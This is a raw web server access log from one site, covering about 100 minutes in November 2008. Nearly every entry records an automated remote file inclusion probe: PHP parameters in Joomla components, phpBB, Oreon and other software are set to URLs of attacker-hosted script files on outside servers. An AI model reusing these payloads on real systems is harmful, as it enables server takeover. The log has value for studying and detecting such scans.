64.127.135.146 - - [16/Nov/2008:16:00:49 -0800] "GET /logs/errors.php?error=http://www.fesclub.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.redneckmba.com"
64.127.135.146 - - [16/Nov/2008:16:00:49 -0800] "GET /logs/errors.php?error=http://www.fesclub.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.redneckmba.com"
64.127.135.146 - - [16/Nov/2008:16:00:49 -0800] "GET /logs/errors.php?error=http://www.fesclub.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.redneckmba.com"
64.127.135.146 - - [16/Nov/2008:16:00:50 -0800] "GET /errors.php?error=http://www.fesclub.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.redneckmba.com"
64.127.135.146 - - [16/Nov/2008:16:00:50 -0800] "GET /errors.php?error=http://www.fesclub.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.redneckmba.com"
64.127.135.146 - - [16/Nov/2008:16:00:50 -0800] "GET /errors.php?error=http://www.fesclub.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.redneckmba.com"
202.64.130.106 - - [16/Nov/2008:16:01:45 -0800] "GET /logs/access.log%20//src/browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.redneckmba.com"
213.198.112.132 - - [16/Nov/2008:16:08:08 -0800] "GET /logs/access.log/index.php?redir=http://bedfordfwc.com/xpl/mild.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "redneckmba.com"
213.198.112.132 - - [16/Nov/2008:16:08:09 -0800] "GET /index.php?redir=http://bedfordfwc.com/xpl/mild.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "redneckmba.com"
213.198.112.132 - - [16/Nov/2008:16:08:09 -0800] "GET /logs/index.php?redir=http://bedfordfwc.com/xpl/mild.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "redneckmba.com"
89.218.85.18 - - [16/Nov/2008:16:09:30 -0800] "GET /logout.php?PSA_PATH=http://geocities.com/tester.target/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.redneckmba.com"
89.218.85.18 - - [16/Nov/2008:16:09:30 -0800] "GET /logs/logout.php?PSA_PATH=http://geocities.com/tester.target/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.redneckmba.com"
213.198.112.132 - - [16/Nov/2008:16:11:51 -0800] "GET /logs/index.php?redir=http://bedfordfwc.com/xpl/mild.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.redneckmba.com"
213.198.112.132 - - [16/Nov/2008:16:11:52 -0800] "GET /index.php?redir=http://bedfordfwc.com/xpl/mild.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.redneckmba.com"
118.219.254.108 - - [16/Nov/2008:16:13:51 -0800] "GET /logs/access.log/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://urosystem.co.kr/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.redneckmba.com"
118.219.254.108 - - [16/Nov/2008:16:13:52 -0800] "GET /administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://urosystem.co.kr/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.redneckmba.com"
118.219.254.108 - - [16/Nov/2008:16:13:52 -0800] "GET /logs/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://urosystem.co.kr/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.redneckmba.com"
65.38.105.213 - - [16/Nov/2008:16:15:35 -0800] "GET /logs/config.php?path[docroot]=http://members.lycos.co.uk/sider000/ideex.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.redneckmba.com"
65.38.105.213 - - [16/Nov/2008:16:15:36 -0800] "GET /config.php?path[docroot]=http://members.lycos.co.uk/sider000/ideex.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.redneckmba.com"
89.218.85.18 - - [16/Nov/2008:16:16:04 -0800] "GET /logs/scanhttp://www.geocities.com/tester.target/if?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.redneckmba.com"
89.218.85.18 - - [16/Nov/2008:16:16:05 -0800] "GET /scanhttp://www.geocities.com/tester.target/if?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.redneckmba.com"
76.13.123.195 - - [16/Nov/2008:16:16:36 -0800] "GET /blog/?feed=rss2 HTTP/1.1" 404 275 "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
118.45.190.166 - - [16/Nov/2008:16:19:39 -0800] "GET /administrator/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.betriakvordun.is/images/tst.txt? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "redneckmba.com"
118.45.190.166 - - [16/Nov/2008:16:19:41 -0800] "GET /logs/administrator/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.betriakvordun.is/images/tst.txt? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "redneckmba.com"
76.13.114.106 - - [16/Nov/2008:16:20:51 -0800] "GET /blog/?feed=rss2 HTTP/1.1" 404 275 "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
210.116.103.35 - - [16/Nov/2008:16:22:31 -0800] "GET /logs/access.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.ekorea.net/forum/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
210.116.103.35 - - [16/Nov/2008:16:22:31 -0800] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.ekorea.net/forum/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
89.218.85.18 - - [16/Nov/2008:16:25:04 -0800] "GET /logs/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.geocities.com/tester.target/if?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.redneckmba.com"
89.218.85.18 - - [16/Nov/2008:16:25:04 -0800] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.geocities.com/tester.target/if?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.redneckmba.com"
212.122.161.247 - - [16/Nov/2008:16:25:45 -0800] "GET /logs/access_071224.log//modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.asa.ba/eng/administrator/components/com_admin/pulaid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.redneckmba.com"
212.122.161.247 - - [16/Nov/2008:16:25:45 -0800] "GET /logs//modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.asa.ba/eng/administrator/components/com_admin/pulaid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.redneckmba.com"
212.122.161.247 - - [16/Nov/2008:16:25:46 -0800] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.asa.ba/eng/administrator/components/com_admin/pulaid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.redneckmba.com"
206.221.179.200 - - [16/Nov/2008:16:26:42 -0800] "GET /logs/access.log/allhttp://springber.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.redneckmba.com"
206.221.179.200 - - [16/Nov/2008:16:26:42 -0800] "GET /allhttp://springber.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.redneckmba.com"
206.221.179.200 - - [16/Nov/2008:16:26:42 -0800] "GET /logs/allhttp://springber.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.redneckmba.com"
64.127.135.146 - - [16/Nov/2008:16:28:38 -0800] "GET /logs//components/com_flyspray/startdown.php?file=http://www.fesclub.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.redneckmba.com"
64.127.135.146 - - [16/Nov/2008:16:28:38 -0800] "GET /components/com_flyspray/startdown.php?file=http://www.fesclub.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.redneckmba.com"
118.219.254.108 - - [16/Nov/2008:16:28:44 -0800] "GET /logs/access.log//path/authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://urosystem.co.kr/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.redneckmba.com"
118.219.254.108 - - [16/Nov/2008:16:28:45 -0800] "GET /path/authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://urosystem.co.kr/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.redneckmba.com"
118.219.254.108 - - [16/Nov/2008:16:28:45 -0800] "GET /logs//path/authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://urosystem.co.kr/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.redneckmba.com"
64.127.135.146 - - [16/Nov/2008:16:28:56 -0800] "GET /logs//components/com_flyspray/startdown.php?file=http://www.fesclub.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.redneckmba.com"
64.127.135.146 - - [16/Nov/2008:16:28:57 -0800] "GET /components/com_flyspray/startdown.php?file=http://www.fesclub.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.redneckmba.com"
64.127.135.146 - - [16/Nov/2008:16:29:08 -0800] "GET /logs//components/com_flyspray/startdown.php?file=http://www.fesclub.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.redneckmba.com"
64.127.135.146 - - [16/Nov/2008:16:29:08 -0800] "GET /components/com_flyspray/startdown.php?file=http://www.fesclub.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.redneckmba.com"
64.127.135.146 - - [16/Nov/2008:16:30:43 -0800] "GET /logs/access.log/errors.php?error=http://www.fesclub.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.redneckmba.com"
64.127.135.146 - - [16/Nov/2008:16:30:43 -0800] "GET /errors.php?error=http://www.fesclub.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.redneckmba.com"
64.127.135.146 - - [16/Nov/2008:16:30:48 -0800] "GET /logs/errors.php?error=http://www.fesclub.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.redneckmba.com"
64.127.135.146 - - [16/Nov/2008:16:31:14 -0800] "GET /logs/access.log/errors.php?error=http://www.fesclub.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.redneckmba.com"
64.127.135.146 - - [16/Nov/2008:16:31:15 -0800] "GET /errors.php?error=http://www.fesclub.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.redneckmba.com"
64.127.135.146 - - [16/Nov/2008:16:31:15 -0800] "GET /logs/errors.php?error=http://www.fesclub.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.redneckmba.com"
64.127.135.146 - - [16/Nov/2008:16:31:50 -0800] "GET /logs/access.log/errors.php?error=http://www.fesclub.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.redneckmba.com"
64.127.135.146 - - [16/Nov/2008:16:31:50 -0800] "GET /errors.php?error=http://www.fesclub.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.redneckmba.com"
64.127.135.146 - - [16/Nov/2008:16:31:50 -0800] "GET /logs/errors.php?error=http://www.fesclub.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.redneckmba.com"
89.218.85.18 - - [16/Nov/2008:16:34:37 -0800] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.geocities.com/tester.target/if?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.redneckmba.com"
89.218.85.18 - - [16/Nov/2008:16:34:37 -0800] "GET /phpsecurityadmin/include/logout.php?PSA_PATH=http://www.geocities.com/tester.target/if?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.redneckmba.com"
64.127.135.146 - - [16/Nov/2008:16:35:12 -0800] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.fesclub.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.redneckmba.com"
64.127.135.146 - - [16/Nov/2008:16:35:13 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.fesclub.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.redneckmba.com"
64.127.135.146 - - [16/Nov/2008:16:35:48 -0800] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.fesclub.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.redneckmba.com"
64.127.135.146 - - [16/Nov/2008:16:35:48 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.fesclub.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.redneckmba.com"
64.127.135.146 - - [16/Nov/2008:16:36:20 -0800] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.fesclub.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.redneckmba.com"
64.127.135.146 - - [16/Nov/2008:16:36:20 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.fesclub.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.redneckmba.com"
89.159.202.119 - - [16/Nov/2008:16:36:25 -0800] "GET /logs/access.log HTTP/1.0" 200 12231 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.redneckmba.com"
209.85.238.3 - - [16/Nov/2008:16:40:25 -0800] "GET /blog/ HTTP/1.1" 404 275 "-" "Feedfetcher-Google; (+http://www.google.com/feedfetcher.html; 1 subscribers; feed-id=2093614446390835355)" "www.redneckmba.com"
165.98.224.194 - - [16/Nov/2008:16:44:26 -0800] "GET /logs//include/admin.lib.inc.php?site_path=http://www.bgfc.org/ktmlpro/includes/ktedit/idj.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.redneckmba.com"
165.98.224.194 - - [16/Nov/2008:16:44:26 -0800] "GET /include/admin.lib.inc.php?site_path=http://www.bgfc.org/ktmlpro/includes/ktedit/idj.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.redneckmba.com"
66.163.171.205 - - [16/Nov/2008:16:45:24 -0800] "GET /blog/?feed=rss2 HTTP/1.1" 404 275 "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
219.106.227.162 - - [16/Nov/2008:16:49:59 -0800] "GET /logs/access.log/errors.php?error=http://www.bgfc.org/ktmlpro/includes/ktedit/idj.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "redneckmba.com"
219.106.227.162 - - [16/Nov/2008:16:50:01 -0800] "GET /logs/errors.php?error=http://www.bgfc.org/ktmlpro/includes/ktedit/idj.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "redneckmba.com"
219.106.227.162 - - [16/Nov/2008:16:50:02 -0800] "GET /errors.php?error=http://www.bgfc.org/ktmlpro/includes/ktedit/idj.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "redneckmba.com"
219.106.227.162 - - [16/Nov/2008:16:50:02 -0800] "GET /logs/access.log/errors.php?error=http://www.bgfc.org/ktmlpro/includes/ktedit/idj.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "redneckmba.com"
219.106.227.162 - - [16/Nov/2008:16:50:02 -0800] "GET /errors.php?error=http://www.bgfc.org/ktmlpro/includes/ktedit/idj.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "redneckmba.com"
219.106.227.162 - - [16/Nov/2008:16:50:02 -0800] "GET /logs/errors.php?error=http://www.bgfc.org/ktmlpro/includes/ktedit/idj.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "redneckmba.com"
219.106.227.162 - - [16/Nov/2008:16:50:26 -0800] "GET /include/admin.lib.inc.php?site_path=http://www.bgfc.org/ktmlpro/includes/ktedit/idj.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "redneckmba.com"
219.106.227.162 - - [16/Nov/2008:16:50:26 -0800] "GET /logs//include/admin.lib.inc.php?site_path=http://www.bgfc.org/ktmlpro/includes/ktedit/idj.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "redneckmba.com"
219.106.227.162 - - [16/Nov/2008:16:50:34 -0800] "GET /logs/access.log//include/admin.lib.inc.php?site_path=http://www.bgfc.org/ktmlpro/includes/ktedit/idj.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "redneckmba.com"
219.106.227.162 - - [16/Nov/2008:16:50:47 -0800] "GET /include/admin.lib.inc.php?site_path=http://www.bgfc.org/ktmlpro/includes/ktedit/idj.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "redneckmba.com"
219.106.227.162 - - [16/Nov/2008:16:50:47 -0800] "GET /logs/access.log//include/admin.lib.inc.php?site_path=http://www.bgfc.org/ktmlpro/includes/ktedit/idj.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "redneckmba.com"
219.106.227.162 - - [16/Nov/2008:16:50:48 -0800] "GET /logs//include/admin.lib.inc.php?site_path=http://www.bgfc.org/ktmlpro/includes/ktedit/idj.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "redneckmba.com"
121.78.237.75 - - [16/Nov/2008:16:55:53 -0800] "GET /?sIncPath=http://www.betriakvordun.is/images/tst.txt? HTTP/1.1" 200 779 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "redneckmba.com"
121.78.237.75 - - [16/Nov/2008:16:55:56 -0800] "GET /logs//?sIncPath=http://www.betriakvordun.is/images/tst.txt? HTTP/1.1" 200 1944 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "redneckmba.com"
67.18.151.242 - - [16/Nov/2008:17:01:04 -0800] "GET /logs/access.log//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.jeondae.es.kr/bbs//skin/zero_vote/12-cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.redneckmba.com"
67.18.151.242 - - [16/Nov/2008:17:01:04 -0800] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.jeondae.es.kr/bbs//skin/zero_vote/12-cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.redneckmba.com"
67.18.151.242 - - [16/Nov/2008:17:01:04 -0800] "GET /logs//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.jeondae.es.kr/bbs//skin/zero_vote/12-cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.redneckmba.com"
190.41.11.250 - - [16/Nov/2008:17:02:55 -0800] "GET /logs/?dir[plugins]=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 200 1939 "-" "libwww-perl/5.805" "www.redneckmba.com"
190.41.11.250 - - [16/Nov/2008:17:02:56 -0800] "GET /?dir[plugins]=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 200 779 "-" "libwww-perl/5.805" "www.redneckmba.com"
78.31.64.178 - - [16/Nov/2008:17:04:47 -0800] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.redneckmba.com"
78.31.64.178 - - [16/Nov/2008:17:04:48 -0800] "GET /include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.redneckmba.com"
78.31.64.178 - - [16/Nov/2008:17:04:49 -0800] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.redneckmba.com"
78.31.64.178 - - [16/Nov/2008:17:04:49 -0800] "GET /include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.redneckmba.com"
80.67.20.101 - - [16/Nov/2008:17:05:00 -0800] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.redneckmba.com"
80.67.20.101 - - [16/Nov/2008:17:05:00 -0800] "GET /include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.redneckmba.com"
165.98.224.194 - - [16/Nov/2008:17:05:12 -0800] "GET /logs//include/admin.lib.inc.php?site_path=http://www.bgfc.org/ktmlpro/includes/ktedit/idj.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.redneckmba.com"
165.98.224.194 - - [16/Nov/2008:17:05:12 -0800] "GET /include/admin.lib.inc.php?site_path=http://www.bgfc.org/ktmlpro/includes/ktedit/idj.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.redneckmba.com"
89.218.85.18 - - [16/Nov/2008:17:05:19 -0800] "GET /logout.php?PSA_PATH=http://dld.go.th/info.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.redneckmba.com"
80.67.23.90 - - [16/Nov/2008:17:05:19 -0800] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.redneckmba.com"
80.67.23.90 - - [16/Nov/2008:17:05:19 -0800] "GET /include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.redneckmba.com"
80.67.23.90 - - [16/Nov/2008:17:05:22 -0800] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.redneckmba.com"
80.67.23.90 - - [16/Nov/2008:17:05:23 -0800] "GET /include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.redneckmba.com"
80.67.20.101 - - [16/Nov/2008:17:05:27 -0800] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.redneckmba.com"
80.67.20.101 - - [16/Nov/2008:17:05:27 -0800] "GET /include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.redneckmba.com"
89.218.85.18 - - [16/Nov/2008:17:05:35 -0800] "GET /logout.php?PSA_PATH=http://dld.go.th/info.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.redneckmba.com"
67.18.151.242 - - [16/Nov/2008:17:06:21 -0800] "GET /logs//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.jeondae.es.kr/bbs//skin/zero_vote/12-cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.redneckmba.com"
67.18.151.242 - - [16/Nov/2008:17:06:21 -0800] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.jeondae.es.kr/bbs//skin/zero_vote/12-cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.redneckmba.com"
64.18.162.8 - - [16/Nov/2008:17:07:30 -0800] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.redneckmba.com"
64.18.162.8 - - [16/Nov/2008:17:07:30 -0800] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.redneckmba.com"
64.18.162.8 - - [16/Nov/2008:17:07:30 -0800] "GET /include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.redneckmba.com"
64.18.162.8 - - [16/Nov/2008:17:07:30 -0800] "GET /include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.redneckmba.com"
165.98.224.194 - - [16/Nov/2008:17:09:07 -0800] "GET /errors.php?error=http://www.bgfc.org/ktmlpro/includes/ktedit/idj.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.redneckmba.com"
165.98.224.194 - - [16/Nov/2008:17:09:08 -0800] "GET /logs/errors.php?error=http://www.bgfc.org/ktmlpro/includes/ktedit/idj.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.redneckmba.com"
207.250.188.51 - - [16/Nov/2008:17:09:47 -0800] "GET /logs/access.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://dcfcsite.org/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
207.250.188.51 - - [16/Nov/2008:17:09:47 -0800] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://dcfcsite.org/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
91.103.204.230 - - [16/Nov/2008:17:10:08 -0800] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.redneckmba.com"
91.103.204.230 - - [16/Nov/2008:17:10:08 -0800] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.redneckmba.com"
91.103.204.230 - - [16/Nov/2008:17:10:08 -0800] "GET /include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.redneckmba.com"
91.103.204.230 - - [16/Nov/2008:17:10:08 -0800] "GET /include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.redneckmba.com"
219.106.227.162 - - [16/Nov/2008:17:13:32 -0800] "GET /logs/access.log%20//include/admin.lib.inc.php?site_path=http://www.bgfc.org/ktmlpro/includes/ktedit/idj.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "redneckmba.com"
207.250.188.51 - - [16/Nov/2008:17:13:51 -0800] "GET /logs/access_080825.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://dcfcsite.org/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.redneckmba.com"
219.106.227.162 - - [16/Nov/2008:17:20:19 -0800] "GET /errors.php?error=http://www.bgfc.org/ktmlpro/includes/ktedit/idj.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.redneckmba.com"
219.106.227.162 - - [16/Nov/2008:17:21:59 -0800] "GET /logs/access.log%20//include/admin.lib.inc.php?site_path=http://www.bgfc.org/ktmlpro/includes/ktedit/idj.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "redneckmba.com"
216.75.35.118 - - [16/Nov/2008:17:30:41 -0800] "GET /rgboard/include/bbs.lib.inc.php?site_path=http://www.elitewheels.ru/images/inc?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.redneckmba.com"
76.13.123.193 - - [16/Nov/2008:17:34:53 -0800] "GET /blog/?feed=rss2 HTTP/1.1" 404 275 "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
216.75.35.118 - - [16/Nov/2008:17:40:16 -0800] "GET /logs/access.log//rgboard/include/bbs.lib.inc.php?site_path=http://www.elitewheels.ru/images/inc?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.redneckmba.com"
216.75.35.118 - - [16/Nov/2008:17:40:16 -0800] "GET /rgboard/include/bbs.lib.inc.php?site_path=http://www.elitewheels.ru/images/inc?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.redneckmba.com"
